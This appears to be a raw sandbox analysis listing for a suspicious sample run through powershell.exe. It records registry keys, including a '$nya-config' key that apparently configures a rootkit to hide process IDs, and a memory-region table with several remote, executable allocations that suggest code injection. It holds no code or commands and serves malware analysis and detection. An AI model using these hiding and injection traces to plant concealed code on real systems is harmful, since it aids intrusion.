\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
LinkDate
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
BinProductVersion
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
AppxPackageFullName
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
AppxPackageRelativeId
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Size
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Language
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
IsOsComponent
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\$nya-config\pid
1420
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
0018800F406D1E7F
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceTicket
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
0018800F406D1E7F
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceTicket
HKEY_LOCAL_MACHINE\SOFTWARE\$nya-config\pid
svc64
There are 34 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2A6605C0000
heap
page read and write
26A88415000
heap
page read and write
2BAAC601000
unkown
page read and write
FC84D7C000
stack
page read and write
2BAAA431000
unkown
page readonly
20E8B1C0000
unkown
page execute and read and write
20411757000
heap
page read and write
27618E34000
heap
page read and write
20410F9E000
heap
page read and write
21A20221000
unkown
page read and write
1F2F3BE000
stack
page read and write
7FF51356D000
unkown
page readonly
20411779000
heap
page read and write
7FFD9B920000
trusted library allocation
page read and write
20410F96000
heap
page read and write
2761A6F4000
heap
page read and write
7FF5A94D6000
unkown
page readonly
28728CFF000
heap
page read and write
3118000
heap
page read and write
1DDAF205000
heap
page read and write
26A87E40000
heap
page read and write
1C8DA460000
unkown
page readonly
27618E5C000
heap
page read and write
1A610120000
heap
page read and write
27618E6C000
heap
page read and write
26A87313000
unkown
page read and write
F25AA7E000
stack
page read and write
20410F00000
trusted library allocation
page read and write
2BAAD4EC000
unkown
page read and write
1DDAECD2000
heap
page read and write
26A87D40000
trusted library allocation
page read and write
28728CD7000
heap
page read and write
1C8DBF63000
heap
page read and write
1C8EDAF1000
trusted library allocation
page read and write
13801111000
trusted library allocation
page read and write
2BAAD34F000
unkown
page read and write
26A87E79000
heap
page read and write
2BAAC81A000
unkown
page read and write
2A660610000
unkown
page read and write
7FF582BE1000
unkown
page readonly
27618E49000
heap
page read and write
1E0855C3000
heap
page read and write
2A660602000
unkown
page read and write
2A66060E000
unkown
page read and write
2BAAE647000
unkown
page read and write
807437F000
stack
page read and write
20412FF6000
heap
page read and write
1C8DA462000
unkown
page readonly
20410FCB000
heap
page read and write
1E0855D0000
heap
page read and write
2A660720000
heap
page read and write
1C8EDAF3000
trusted library allocation
page read and write
2FD0000
unkown
page read and write
2295CCB0000
unkown
page readonly
26A87E64000
heap
page read and write
202C0475000
unkown
page read and write
138702E1000
heap
page read and write
2BAAC80A000
unkown
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
4AC9000
unkown
page read and write
276188B9000
heap
page read and write
2BAAC8CF000
unkown
page read and write
17953760000
unkown
page read and write
4C9BFE000
stack
page read and write
1C8DBF33000
heap
page read and write
26A87E88000
heap
page read and write
2EB9000
unkown
page read and write
D01AAFE000
unkown
page read and write
202C0B39000
unkown
page readonly
26A87E5E000
heap
page read and write
2BAAD630000
unkown
page read and write
20410F90000
heap
page read and write
28728EBA000
heap
page read and write
287293AF000
heap
page read and write
6ED55FE000
stack
page read and write
7FF52D126000
unkown
page readonly
28728E80000
heap
page read and write
73C0000
unkown
page read and write
1A610220000
heap
page read and write
1E0855B8000
heap
page read and write
2BAAC760000
unkown
page readonly
26A8843B000
heap
page read and write
2295CE56000
unkown
page read and write
202C040A000
unkown
page read and write
C7E9A7E000
stack
page read and write
6FCD000
unkown
page read and write
26A87E35000
heap
page read and write
7FFD9B8B0000
trusted library allocation
page read and write
20410F47000
heap
page read and write
20411782000
heap
page read and write
72129FE000
unkown
page readonly
2A660A35000
unkown
page read and write
7FFD9B8D0000
trusted library allocation
page read and write
276188D5000
heap
page read and write
1E0855D0000
heap
page read and write
7FFD9B6DD000
trusted library allocation
page execute and read and write
28728CB1000
heap
page read and write
225DCB39000
unkown
page read and write
20410FA1000
heap
page read and write
13870429000
heap
page read and write
1386FB50000
heap
page readonly
276187E0000
trusted library allocation
page read and write
1E085030000
trusted library allocation
page read and write
26A87E5F000
heap
page read and write
7415000
unkown
page read and write
2A6608D0000
unkown
page readonly
D01AFFB000
stack
page read and write
7FF52D0F5000
unkown
page readonly
1381008C000
trusted library allocation
page read and write
2D0D49B5000
heap
page read and write
1C8DBEF6000
heap
page read and write
20410F8A000
heap
page read and write
6E4E000
unkown
page read and write
C19D8FE000
stack
page read and write
1DDAE9EE000
heap
page read and write
26A87940000
unkown
page read and write
28728CB3000
heap
page read and write
26A87A02000
unkown
page read and write
1E084F76000
heap
page read and write
1F2F0BF000
stack
page read and write
25800001000
unkown
page read and write
1E0855C1000
heap
page read and write
2D0D4910000
heap
page read and write
2BAA7C90000
unkown
page readonly
1F2F239000
stack
page read and write
28728E50000
trusted library allocation
page read and write
2295D461000
unkown
page readonly
26A87D80000
trusted library allocation
page read and write
13801688000
trusted library allocation
page read and write
1E4E9F7B000
heap
page read and write
28728EBE000
heap
page read and write
6EFE000
unkown
page read and write
287293CB000
heap
page read and write
20412FFD000
heap
page read and write
2BAAA06F000
unkown
page read and write
7FF582BAB000
unkown
page readonly
2BAB0583000
unkown
page read and write
6E75000
heap
page execute and read and write
FC84FFE000
stack
page read and write
7FF5A93C5000
unkown
page readonly
6ED53FD000
stack
page read and write
1E084F2E000
heap
page read and write
7740000
unkown
page read and write
202C045B000
unkown
page read and write
7FF582B4F000
unkown
page readonly
20411779000
heap
page read and write
7FF52D001000
unkown
page readonly
28728C98000
heap
page read and write
225DBFB0000
unkown
page read and write
225DC9FB000
unkown
page read and write
1C8DBEFC000
heap
page read and write
2BAAC562000
unkown
page read and write
8C9ABFE000
stack
page read and write
D01B1FC000
unkown
page read and write
21A20221000
unkown
page read and write
287293D3000
heap
page read and write
1E084F51000
heap
page read and write
7FF550468000
unkown
page readonly
17953770000
unkown
page execute and read and write
2BAAC6D1000
unkown
page read and write
28728C72000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
2761A6F4000
heap
page read and write
BC08DAB000
stack
page read and write
1E084F51000
heap
page read and write
2BAA94A8000
unkown
page read and write
20411764000
heap
page read and write
7FF58138C000
unkown
page readonly
D01AE78000
unkown
page read and write
26A87E07000
heap
page read and write
20411782000
heap
page read and write
27618E4F000
heap
page read and write
2A7B000
stack
page read and write
1DDB0A73000
heap
page read and write
20410FD1000
heap
page read and write
1DDAEA1B000
heap
page read and write
2041120B000
heap
page read and write
27618E37000
heap
page read and write
7FF58142C000
unkown
page readonly
2D0D4BD5000
heap
page read and write
1E0855C8000
heap
page read and write
225DC6E0000
heap
page read and write
28728CEE000
heap
page read and write
723D000
unkown
page read and write
2761889D000
heap
page read and write
7FF5A9521000
unkown
page readonly
28728CC3000
heap
page read and write
2BAA7CB0000
heap
page read and write
2A660702000
unkown
page read and write
7212D7E000
stack
page read and write
2BAADC80000
unkown
page readonly
2BAAE5B3000
unkown
page read and write
2D0D4A04000
heap
page read and write
807427B000
stack
page read and write
28728C96000
heap
page read and write
20410FD1000
heap
page read and write
26A88420000
heap
page read and write
2D0D49AC000
heap
page read and write
D01AD7E000
unkown
page read and write
1E4E9ED0000
heap
page read and write
1DDAF1E2000
heap
page read and write
1E084F7B000
heap
page read and write
28728EB3000
heap
page read and write
1C8EF0EB000
trusted library allocation
page read and write
7DF4869E1000
unkown
page execute read
7FF5132BD000
unkown
page readonly
2041120E000
heap
page read and write
1C8DBFF0000
trusted library allocation
page read and write
F25A97D000
stack
page read and write
28728EB7000
heap
page read and write
21A20221000
unkown
page read and write
1E0855DC000
heap
page read and write
3116000
heap
page read and write
20410F9E000
heap
page read and write
28728E50000
trusted library allocation
page read and write
1DDAE9E5000
heap
page read and write
1E0855C8000
heap
page read and write
225DC380000
unkown
page readonly
1C8DDAF1000
trusted library allocation
page read and write
26A87E49000
heap
page read and write
1E084F28000
heap
page read and write
2D0D51D0000
trusted library allocation
page read and write
287293BF000
heap
page read and write
4C87FE000
stack
page read and write
276188C2000
heap
page read and write
13801460000
trusted library allocation
page read and write
28728EBE000
heap
page read and write
1E084F07000
heap
page read and write
27618891000
heap
page read and write
7FFD9BA1C000
trusted library allocation
page read and write
FC8467C000
stack
page read and write
2BAAC7D8000
unkown
page read and write
225DBFF7000
heap
page read and write
26A87E25000
heap
page read and write
FC84BFE000
stack
page read and write
2BAACB72000
unkown
page read and write
72FE000
unkown
page read and write
7FF52D1B9000
unkown
page readonly
2BAAC585000
unkown
page read and write
28728CBA000
heap
page read and write
7FF52D1B2000
unkown
page readonly
26A87E7A000
heap
page read and write
1DDAECDA000
heap
page read and write
7FF5812EB000
unkown
page readonly
287293D9000
heap
page read and write
2BAAC964000
unkown
page read and write
FC846FE000
stack
page read and write
1C8DBF1B000
heap
page read and write
28728C68000
heap
page read and write
2CC0000
unkown
page read and write
755E000
unkown
page read and write
F25A9FE000
stack
page read and write
1C8DAE62000
unkown
page readonly
1E4EB920000
heap
page read and write
7FF52CEBF000
unkown
page readonly
20411789000
heap
page read and write
287293A7000
heap
page read and write
72127FE000
unkown
page readonly
7FF58141E000
unkown
page readonly
2BAAC973000
unkown
page read and write
27618E5C000
heap
page read and write
2950000
heap
page read and write
8140000
unkown
page readonly
202BFD02000
unkown
page read and write
7FF582BA6000
unkown
page readonly
28728EB0000
heap
page read and write
2BAAA061000
unkown
page read and write
7212BFE000
unkown
page readonly
1E0855C2000
heap
page read and write
1DDAEA25000
heap
page read and write
1CC91450000
unkown
page execute and read and write
8C9A8FF000
stack
page read and write
287293C9000
heap
page read and write
28728C94000
heap
page read and write
1DDAE990000
heap
page read and write
13870160000
heap
page read and write
26A87E4E000
heap
page read and write
21A20221000
unkown
page read and write
1DDAEA39000
heap
page read and write
1386FC80000
heap
page read and write
202C03BA000
unkown
page read and write
26A87E32000
heap
page read and write
8C9A4FE000
stack
page read and write
28728F15000
heap
page read and write
27618E69000
heap
page read and write
138702E5000
heap
page read and write
1E084F59000
heap
page read and write
2BAB2FD9000
unkown
page readonly
7FF5A9557000
unkown
page readonly
138704F0000
trusted library allocation
page read and write
7FF5A9502000
unkown
page readonly
BA730E9000
stack
page read and write
1DDAE9C7000
heap
page read and write
2BAAE406000
unkown
page read and write
3F99EFF000
stack
page read and write
1E084F3F000
heap
page read and write
F25A5B2000
stack
page read and write
1E0855D9000
heap
page read and write
A81DEFF000
stack
page read and write
28728CF0000
heap
page read and write
7FF582AE5000
unkown
page readonly
1795302B000
unkown
page read and write
28728EBA000
heap
page read and write
225DCA02000
unkown
page read and write
20411768000
heap
page read and write
287293B2000
heap
page read and write
26A87E43000
heap
page read and write
2295CD40000
heap
page read and write
7DF486A11000
unkown
page execute read
FC84B7B000
stack
page read and write
13801902000
trusted library allocation
page read and write
7FF52CE08000
unkown
page readonly
22D86210000
heap
page read and write
20410F77000
heap
page read and write
2BAAEB40000
unkown
page read and write
1E085030000
trusted library allocation
page read and write
2BAAA451000
unkown
page readonly
1DDAF1ED000
heap
page read and write
7FF51358B000
unkown
page readonly
2BAAE5AD000
unkown
page read and write
20413150000
heap
page read and write
2D0D57FF000
trusted library allocation
page read and write
1E086E5D000
heap
page read and write
1DDAF1D0000
heap
page read and write
225DC690000
unkown
page read and write
2761A6E7000
heap
page read and write
2BAA94C2000
unkown
page read and write
7FFD9B940000
trusted library allocation
page read and write
2A660560000
unkown
page readonly
7DF486A91000
unkown
page execute read
A81DBAB000
stack
page read and write
2BAACBC0000
unkown
page read and write
D01BCCB000
unkown
page read and write
7FF52D13E000
unkown
page readonly
225DCB70000
unkown
page readonly
1E084F3F000
heap
page read and write
2BAA946C000
unkown
page read and write
23ED9900000
heap
page read and write
7DF486A51000
unkown
page execute read
27618891000
heap
page read and write
7FF5A94C8000
unkown
page readonly
7FFDE21F0000
unkown
page execute read
7FFD9BB40000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
1DDAEA0D000
heap
page read and write
27618877000
heap
page read and write
7FF58130A000
unkown
page readonly
727B000
unkown
page read and write
4A6E000
unkown
page read and write
287293D2000
heap
page read and write
202BFBF0000
unkown
page read and write
20410F89000
heap
page read and write
2BAAC9F2000
unkown
page read and write
20411763000
heap
page read and write
2BAAC570000
unkown
page read and write
20411765000
heap
page read and write
20410F8B000
heap
page read and write
2D0D5040000
trusted library allocation
page read and write
A9252FF000
unkown
page read and write
276188CE000
heap
page read and write
1E4E9F92000
heap
page read and write
2220C4F0000
unkown
page execute and read and write
7419000
unkown
page read and write
2BAAD1A0000
unkown
page read and write
24D9FF40000
unkown
page execute and read and write
8B38AFE000
unkown
page readonly
C5F64FE000
unkown
page readonly
26A87E4C000
heap
page read and write
7DF486A61000
unkown
page execute read
26A87DF0000
heap
page read and write
20410F99000
heap
page read and write
1DDAF1ED000
heap
page read and write
1C8DB0A2000
unkown
page readonly
7FF5123FD000
unkown
page readonly
20410F9E000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
20410FD1000
heap
page read and write
2BAADE80000
unkown
page read and write
20410F86000
heap
page read and write
2BAAAF66000
unkown
page read and write
7FF51342C000
unkown
page readonly
1DDAECD0000
heap
page read and write
138100AE000
trusted library allocation
page read and write
2A660700000
unkown
page read and write
3100000
unkown
page read and write
2A6605F0000
unkown
page read and write
7FF512431000
unkown
page readonly
2BAAAD49000
unkown
page read and write
21A20221000
unkown
page read and write
24D9FE61000
unkown
page readonly
21A20221000
unkown
page read and write
1DDAF1FC000
heap
page read and write
276188F9000
heap
page read and write
2BAA78F0000
unkown
page readonly
7FFD9BAF0000
trusted library allocation
page read and write
2BAAAD13000
unkown
page read and write
1E085080000
heap
page read and write
1386FB60000
trusted library allocation
page read and write
27B04B2E000
unkown
page read and write
2BAAE593000
unkown
page read and write
1DDAF1ED000
heap
page read and write
17952FD0000
heap
page read and write
20411204000
heap
page read and write
7E0073645000
unkown
page readonly
2D0D4920000
heap
page read and write
21A20221000
unkown
page read and write
1E0855E9000
heap
page read and write
2BAAE160000
unkown
page read and write
1C8DBF94000
heap
page read and write
2BAAC520000
unkown
page read and write
4CA3FE000
stack
page read and write
21A20221000
unkown
page read and write
20411750000
heap
page read and write
2BAA7B6D000
heap
page read and write
7FF52D1C7000
unkown
page readonly
27618E33000
heap
page read and write
7FF512444000
unkown
page readonly
2BAAAD1F000
unkown
page read and write
2BAAE353000
unkown
page read and write
21A1F67D000
heap
page read and write
7FF52D03B000
unkown
page readonly
26A87E64000
heap
page read and write
27618900000
heap
page read and write
684C67E000
stack
page read and write
2BAADCD0000
unkown
page read and write
2BAAD710000
unkown
page readonly
27B0412E000
unkown
page read and write
138016A6000
trusted library allocation
page read and write
1E085060000
heap
page read and write
6ED56FE000
unkown
page readonly
1E0855D9000
heap
page read and write
49FE000
unkown
page read and write
4C8BFE000
stack
page read and write
7212DFE000
unkown
page readonly
26A88448000
heap
page read and write
7FF5504E2000
unkown
page readonly
7FF512372000
unkown
page readonly
202C02B2000
unkown
page read and write
F25B9CE000
stack
page read and write
1E0855BC000
heap
page read and write
2761A6E2000
heap
page read and write
1DDAF1E4000
heap
page read and write
27B0372E000
unkown
page read and write
138019CB000
trusted library allocation
page read and write
26A88431000
heap
page read and write
2295D0D0000
unkown
page readonly
21A20221000
unkown
page read and write
21A20221000
unkown
page read and write
2BAAA074000
unkown
page read and write
721237E000
stack
page read and write
287293AC000
heap
page read and write
1DDAF1E4000
heap
page read and write
28728CD2000
heap
page read and write
26A88448000
heap
page read and write
1DDAECD7000
heap
page read and write
4D16000
unkown
page read and write
761E000
unkown
page read and write
202C0B32000
unkown
page readonly
26A88437000
heap
page read and write
1C8DC1E5000
heap
page read and write
20413004000
heap
page read and write
13801104000
trusted library allocation
page read and write
20411789000
heap
page read and write
7FF581471000
unkown
page readonly
276188BD000
heap
page read and write
1E085030000
trusted library allocation
page read and write
20410F84000
heap
page read and write
1C8DBF30000
heap
page read and write
28728CFF000
heap
page read and write
684C6FE000
stack
page read and write
1E4E9F38000
heap
page read and write
7FFD9B6CD000
trusted library allocation
page execute and read and write
1DDAEA1F000
heap
page read and write
7FF581452000
unkown
page readonly
26A87D20000
heap
page read and write
27618E69000
heap
page read and write
1C8DC0E5000
heap
page read and write
7FF52D161000
unkown
page readonly
7FF582BE6000
unkown
page readonly
2530E9F5000
heap
page read and write
202BFA30000
unkown
page readonly
1E085450000
heap
page read and write
1E084F59000
heap
page read and write
2BAAACD2000
unkown
page read and write
FC850FE000
stack
page read and write
2BAAD690000
unkown
page readonly
7FF5A90B2000
unkown
page readonly
28728EB5000
heap
page read and write
1E0855D9000
heap
page read and write
1386FB00000
trusted library section
page read and write
1E4E9F2E000
heap
page read and write
4950000
unkown
page readonly
202BFD13000
unkown
page read and write
21A20221000
unkown
page read and write
1E084F91000
heap
page read and write
EADE7C8000
stack
page read and write
276188CC000
heap
page read and write
20410F8E000
heap
page read and write
20410F86000
heap
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
1DDAEA48000
heap
page read and write
28728CB0000
heap
page read and write
20410FA8000
heap
page read and write
1C8EE6EB000
trusted library allocation
page read and write
73F9000
unkown
page read and write
A92577C000
unkown
page read and write
2A6612D0000
unkown
page execute and read and write
7FF5135E9000
unkown
page readonly
276187BB000
heap
page read and write
2A660550000
unkown
page readonly
2295CD80000
unkown
page read and write
7FF58135F000
unkown
page readonly
7FF51354C000
unkown
page readonly
710D000
unkown
page read and write
26A88433000
heap
page read and write
2295CD50000
heap
page read and write
2BAAC5E5000
unkown
page read and write
7FF512469000
unkown
page readonly
1DDAF1E8000
heap
page read and write
2BAAC57A000
unkown
page read and write
1DDAE9C7000
heap
page read and write
20410F8E000
heap
page read and write
7FFDE21F0000
unkown
page execute read
7FF52CD82000
unkown
page readonly
1380172E000
trusted library allocation
page read and write
26A88454000
heap
page read and write
1A610535000
heap
page read and write
28728CFF000
heap
page read and write
2BAADD90000
unkown
page readonly
2BAB067E000
unkown
page read and write
21A20221000
unkown
page read and write
26A88451000
heap
page read and write
26A88412000
heap
page read and write
27B0719F000
unkown
page read and write
7FF5135B8000
unkown
page readonly
7720000
unkown
page read and write
28728C40000
heap
page read and write
7DF486A01000
unkown
page execute read
1E085010000
heap
page read and write
26A89CD4000
heap
page read and write
6B02DFE000
stack
page read and write
C5F6CFD000
stack
page read and write
2BAAA0A9000
unkown
page read and write
2872ACCE000
heap
page read and write
F25A8FE000
stack
page read and write
2BAAE15D000
unkown
page read and write
A92644E000
unkown
page read and write
2220AB60000
remote allocation
page execute and read and write
1DDAE9C2000
heap
page read and write
2BAAAD38000
unkown
page read and write
1E0855E9000
heap
page read and write
287293C9000
heap
page read and write
21A20221000
unkown
page read and write
27618E3E000
heap
page read and write
24D9FF70000
direct allocation
page readonly
21A20221000
unkown
page read and write
21A20221000
unkown
page read and write
77AB000
unkown
page read and write
1F2F1BC000
stack
page read and write
21A20221000
unkown
page read and write
1E084F42000
heap
page read and write
1E084F25000
heap
page read and write
1C8F61B4000
heap
page read and write
1E4E9F67000
heap
page read and write
1DDAF202000
heap
page read and write
6EBF000
unkown
page read and write
2BAADC90000
unkown
page readonly
7FF55036B000
unkown
page readonly
7FF582B71000
unkown
page readonly
26A88453000
heap
page read and write
EDEC47F000
stack
page read and write
30F0000
unkown
page read and write
27618894000
heap
page read and write
202C034C000
unkown
page read and write
2BAAA076000
unkown
page read and write
1E4E9F20000
heap
page read and write
26A8843B000
heap
page read and write
20412FF2000
heap
page read and write
1A610530000
heap
page read and write
7FF513561000
unkown
page readonly
1386FBA0000
heap
page execute and read and write
202C0268000
unkown
page read and write
1DDAEA18000
heap
page read and write
1DDAF1F9000
heap
page read and write
1DDAEA49000
heap
page read and write
2BAAF1A0000
unkown
page execute and read and write
7FF582BC2000
unkown
page readonly
3288000
heap
page read and write
8B387FE000
unkown
page readonly
21A20221000
unkown
page read and write
2E7F000
unkown
page read and write
7DF486A31000
unkown
page execute read
2295CE00000
unkown
page read and write
202C0B30000
unkown
page read and write
7FF5812E6000
unkown
page readonly
27618E37000
heap
page read and write
23ED95A0000
heap
page read and write
7DF486A40000
unkown
page readonly
2D0D5145000
heap
page read and write
4AF9000
unkown
page read and write
276186B0000
heap
page read and write
7FF51243B000
unkown
page readonly
2BAA7AFB000
heap
page read and write
21A20221000
unkown
page read and write
1DDAEA20000
heap
page read and write
21A1F6C4000
heap
page read and write
1DDAF1ED000
heap
page read and write
258004F3000
unkown
page read and write
1E085464000
heap
page read and write
7FFD9BA18000
trusted library allocation
page read and write
20410F86000
heap
page read and write
A9251D4000
unkown
page read and write
26A87213000
unkown
page read and write
1386FBC2000
heap
page read and write
2BAAD318000
unkown
page read and write
1DDB0A84000
heap
page read and write
2872ACC3000
heap
page read and write
202C0A60000
unkown
page write copy
2041176E000
heap
page read and write
8C9A5FE000
stack
page read and write
75EA278000
stack
page read and write
1DDAEA09000
heap
page read and write
1DDAE980000
heap
page read and write
4A9C000
unkown
page read and write
1E084F48000
heap
page read and write
7FF58127B000
unkown
page readonly
2761A6EE000
heap
page read and write
28728CCD000
heap
page read and write
1DDAEA00000
heap
page read and write
2BAAA058000
unkown
page read and write
2A6605E0000
heap
page read and write
1E084F25000
heap
page read and write
2BAACADD000
unkown
page read and write
2BAADCA0000
unkown
page readonly
20410F3E000
heap
page read and write
2D0D5151000
trusted library allocation
page read and write
21A1F6A5000
heap
page read and write
25800081000
unkown
page read and write
2BAAD31D000
unkown
page read and write
7FF581321000
unkown
page readonly
2BAAACF5000
unkown
page read and write
2F1D000
heap
page read and write
7FF582BBE000
unkown
page readonly
202C01C1000
unkown
page readonly
21A20221000
unkown
page read and write
2A660A00000
unkown
page read and write
4CA7FE000
stack
page read and write
1DDAEA1E000
heap
page read and write
13810001000
trusted library allocation
page read and write
1DDAEBA0000
trusted library allocation
page read and write
2761889D000
heap
page read and write
1386FBC8000
heap
page read and write
2CE0000
unkown
page read and write
1C8EE6DF000
trusted library allocation
page read and write
1C8EE6E1000
trusted library allocation
page read and write
2D0D49F0000
heap
page read and write
2872ACD4000
heap
page read and write
2BAB0604000
unkown
page read and write
276187B0000
heap
page read and write
202C0418000
unkown
page read and write
20410F8E000
heap
page read and write
21A20221000
unkown
page read and write
21A20221000
unkown
page read and write
1DDAEA13000
heap
page read and write
7FFD9B766000
trusted library allocation
page read and write
2761A6E1000
heap
page read and write
7FF581260000
unkown
page readonly
2BAADD10000
unkown
page read and write
8B385ED000
unkown
page read and write
2BAA951E000
unkown
page read and write
2BAAE595000
unkown
page read and write
24D9FF85000
direct allocation
page readonly
EDEC1B8000
stack
page read and write
7FF52D12E000
unkown
page readonly
28728CCE000
heap
page read and write
2BAAAD01000
unkown
page read and write
7FF58126C000
unkown
page readonly
BA7316E000
unkown
page read and write
1E086E5D000
heap
page read and write
76A0000
unkown
page read and write
30D7000
unkown
page execute and read and write
2BAAD530000
unkown
page read and write
24DA1BA6000
unkown
page read and write
2A660C00000
unkown
page readonly
6E0F000
unkown
page read and write
C5F647C000
stack
page read and write
1C8DC020000
heap
page read and write
C19D97F000
stack
page read and write
21A20221000
unkown
page read and write
1386FDC0000
heap
page execute and read and write
20410F69000
heap
page read and write
7FFD9B9B8000
trusted library allocation
page read and write
1DDAEBD0000
heap
page read and write
202C046C000
unkown
page read and write
F25ADFE000
stack
page read and write
13800001000
trusted library allocation
page read and write
2BAA9476000
unkown
page read and write
21A1F6A3000
heap
page read and write
7FF58133A000
unkown
page readonly
13801803000
trusted library allocation
page read and write
276188BD000
heap
page read and write
24D9FF20000
unkown
page readonly
7FF52D194000
unkown
page readonly
28DD000
stack
page read and write
225DC581000
unkown
page readonly
2BAACAF1000
unkown
page read and write
1DDAEA21000
heap
page read and write
7DF486A81000
unkown
page execute read
BA731EE000
stack
page read and write
20412FFD000
heap
page read and write
2041176E000
heap
page read and write
20410F91000
heap
page read and write
80742FF000
unkown
page read and write
1E0855E2000
heap
page read and write
1E085462000
heap
page read and write
2BAAD365000
unkown
page read and write
2BAAD5AF000
unkown
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
2BAAD355000
unkown
page read and write
28728CCF000
heap
page read and write
2BAA7A60000
unkown
page read and write
2BAAC5BF000
unkown
page read and write
26A87A00000
unkown
page read and write
7FF582C39000
unkown
page readonly
2A66067B000
unkown
page read and write
2BAAE38C000
unkown
page read and write
2BAA9FB0000
unkown
page read and write
24D9FFC0000
direct allocation
page read and write
225DBF00000
unkown
page readonly
7FF550519000
unkown
page readonly
202C0277000
unkown
page read and write
1E084F7F000
heap
page read and write
2A6605D0000
unkown
page readonly
1380092F000
trusted library allocation
page read and write
13870372000
heap
page read and write
26A87E02000
heap
page read and write
1DDAEA18000
heap
page read and write
D01AA73000
stack
page read and write
4940000
heap
page read and write
26A8842C000
heap
page read and write
2D0D5110000
heap
page read and write
26A87DA0000
heap
page read and write
276188C2000
heap
page read and write
2BAAA07C000
unkown
page read and write
7FF52D17F000
unkown
page readonly
276188B9000
heap
page read and write
1E085085000
heap
page read and write
26A8841B000
heap
page read and write
17952FE0000
unkown
page readonly
2761A6EE000
heap
page read and write
7FF52CC8D000
unkown
page readonly
7FF582BB1000
unkown
page readonly
8B3887F000
unkown
page read and write
26A87140000
unkown
page readonly
A81DE7F000
unkown
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
2BAB0624000
unkown
page read and write
1E084F62000
heap
page read and write
7FF51236E000
unkown
page readonly
2DC5000
heap
page read and write
2BAAC8C8000
unkown
page read and write
49BE000
unkown
page read and write
A9263FE000
unkown
page read and write
26A87150000
unkown
page readonly
2BAA7B24000
heap
page read and write
225DC699000
unkown
page readonly
26A87E47000
heap
page read and write
7DF4869C1000
unkown
page execute read
75EA37E000
stack
page read and write
276187E0000
trusted library allocation
page read and write
7437000
unkown
page read and write
26A88434000
heap
page read and write
A9258F8000
unkown
page read and write
D01BBCE000
unkown
page read and write
1C8DBC7B000
unkown
page readonly
20410F91000
heap
page read and write
276187E0000
trusted library allocation
page read and write
733E000
unkown
page read and write
2BAACAF4000
unkown
page read and write
8B385F3000
unkown
page read and write
2761A6EE000
heap
page read and write
21A20221000
unkown
page read and write
27B002D2000
unkown
page read and write
2A661300000
remote allocation
page execute and read and write
26A87D40000
trusted library allocation
page read and write
A92654C000
stack
page read and write
276188B3000
heap
page read and write
72BE000
unkown
page read and write
1DDB0A7E000
heap
page read and write
202BFA20000
heap
page read and write
7FF5122D6000
unkown
page readonly
202BFCBE000
unkown
page read and write
20410F8B000
heap
page read and write
3F99B87000
stack
page read and write
20410FCF000
heap
page read and write
30D0000
unkown
page read and write
287293BF000
heap
page read and write
2580047E000
unkown
page read and write
26A87E48000
heap
page read and write
26A89CC2000
heap
page read and write
2BAAA088000
unkown
page read and write
7FFD9B894000
trusted library allocation
page read and write
1E084F25000
heap
page read and write
2BAAC604000
unkown
page read and write
